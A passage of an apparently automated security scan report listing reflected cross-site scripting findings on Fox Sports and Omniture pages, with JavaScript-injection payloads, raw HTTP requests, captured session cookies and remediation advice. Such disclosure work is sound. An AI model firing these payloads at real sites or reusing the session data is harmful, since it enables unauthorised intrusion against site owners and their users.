User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 253307
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=21
Date: Wed, 02 Feb 2011 15:37:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26549032'); // load up team comments </script> ...[SNIP]...
1.144. http://msn.foxsports.com/collegefootball/lists/scout-top-25-team-recruit-rankings [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14d4a'-alert(1)-'ab313af8cd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /collegefootball/lists/scout-top-25-team-recruit-rankings?14d4a'-alert(1)-'ab313af8cd3=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 242788
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=53
Date: Wed, 02 Feb 2011 15:37:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '24'); // load up team comments </script> ...[SNIP]...
1.145. http://msn.foxsports.com/golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93cfb'-alert(1)-'bea40c5b74b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111?93cfb'-alert(1)-'bea40c5b74b=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 256587
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=43
Date: Wed, 02 Feb 2011 15:37:40 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26511070'); // load up team comments </script> ...[SNIP]...
1.146. http://msn.foxsports.com/mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dcc0'-alert(1)-'c4dbd5116c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111?2dcc0'-alert(1)-'c4dbd5116c5=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 245955
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=36
Date: Wed, 02 Feb 2011 15:37:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26546002'); // load up team comments </script> ...[SNIP]...
1.147. http://msn.foxsports.com/nba/page/heat-or-threepeat [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://msn.foxsports.com
Path:
/nba/page/heat-or-threepeat
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4d60'-alert(1)-'1f301dec17c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/page/heat-or-threepeat?f4d60'-alert(1)-'1f301dec17c=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 247480
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=22
Date: Wed, 02 Feb 2011 15:37:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', 'EVENT_295449'); // load up team comments </script> ...[SNIP]...
1.148. http://msn.foxsports.com/nba/story/Mavericks-102-Wizards-92-01372633 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://msn.foxsports.com
Path:
/nba/story/Mavericks-102-Wizards-92-01372633
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f35a8'-alert(1)-'4bf9c40ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/story/Mavericks-102-Wizards-92-01372633?f35a8'-alert(1)-'4bf9c40ab7=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 250652
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=11
Date: Wed, 02 Feb 2011 15:37:28 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26551003'); // load up team comments </script> ...[SNIP]...
1.149. http://msn.foxsports.com/nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42b34'-alert(1)-'dc8cb17c584 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111?42b34'-alert(1)-'dc8cb17c584=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 261871
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=7
Date: Wed, 02 Feb 2011 15:37:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 104a6'-alert(1)-'eed66588032 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Goats?GT1=39002104a6'-alert(1)-'eed66588032 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227087
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=48
Date: Wed, 02 Feb 2011 15:37:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '5'); // load up team comments </script> ...[SNIP]...
1.151. http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Goats [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://msn.foxsports.com
Path:
/nfl/lists/Top_10_Super_Bowl_Goats
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3309'-alert(1)-'0aa3faa4c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Goats?a3309'-alert(1)-'0aa3faa4c6a=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 226893
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Tue, 01 Feb 2011 15:36:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14557'-alert(1)-'f363dc20028 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Heroes?GT1=3900214557'-alert(1)-'f363dc20028 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 226622
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=45
Date: Wed, 02 Feb 2011 15:37:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '5'); // load up team comments </script> ...[SNIP]...
1.153. http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://msn.foxsports.com
Path:
/nfl/lists/Top_10_Super_Bowl_Heroes
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb7fd'-alert(1)-'350d2cec32c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Heroes?bb7fd'-alert(1)-'350d2cec32c=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 226451
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Tue, 01 Feb 2011 15:36:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the gt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feba4'-alert(1)-'a1c1bd68b1d was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?gt1=39002feba4'-alert(1)-'a1c1bd68b1d HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252008
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Date: Wed, 02 Feb 2011 15:37:19 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26544030'); // load up team comments </script> ...[SNIP]...
1.155. http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b9d2'-alert(1)-'f94768913cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?7b9d2'-alert(1)-'f94768913cf=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248480
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=21
Date: Tue, 01 Feb 2011 15:36:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?7b9d2'-alert(1)-'f94768913cf=1';
startComments('StoryComments', '26544030'); // load up team comments </script> ...[SNIP]...
1.156. http://msn.foxsports.com/nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a43a0'-alert(1)-'a64d4955fc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206?a43a0'-alert(1)-'a64d4955fc7=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 253613
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=7
Date: Wed, 02 Feb 2011 15:37:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26569115'); // load up team comments
</script>
...[SNIP]...
1.157. http://msn.foxsports.com/nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85ab0'-alert(1)-'e3786f32ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111?85ab0'-alert(1)-'e3786f32ad=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 258371
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=7
Date: Wed, 02 Feb 2011 15:37:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26541133'); // load up team comments
</script>
...[SNIP]...
1.158. http://msn.foxsports.com/nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4410'-alert(1)-'23ffae24f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111?d4410'-alert(1)-'23ffae24f86=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 258524
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=6
Date: Wed, 02 Feb 2011 15:37:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26554000'); // load up team comments
</script>
...[SNIP]...
1.159. https://my.omniture.com/login/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://my.omniture.com
Path: /login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38a79"-alert(1)-"7f4bdae527e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the jpj request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a15"-alert(1)-"9e4c75fec7b was submitted in the jpj parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132c2a15"-alert(1)-"9e4c75fec7b HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:32:17 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www645
Content-Type: text/html
Connection: close
Content-Length: 27728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
1.161. https://my.omniture.com/p/suite/1.2/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://my.omniture.com
Path: /p/suite/1.2/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfe1"-alert(1)-"79f9f86c119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132&ebfe1"-alert(1)-"79f9f86c119=1 HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:33:35 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www453
Content-Type: text/html
Connection: close
Content-Length: 27828
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the ssSession request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e86ee"-alert(1)-"66ebe3920b5 was submitted in the ssSession parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67e86ee"-alert(1)-"66ebe3920b5&jpj=95253754444132 HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:31:44 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www460
Content-Type: text/html
Connection: close
Content-Length: 27586
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
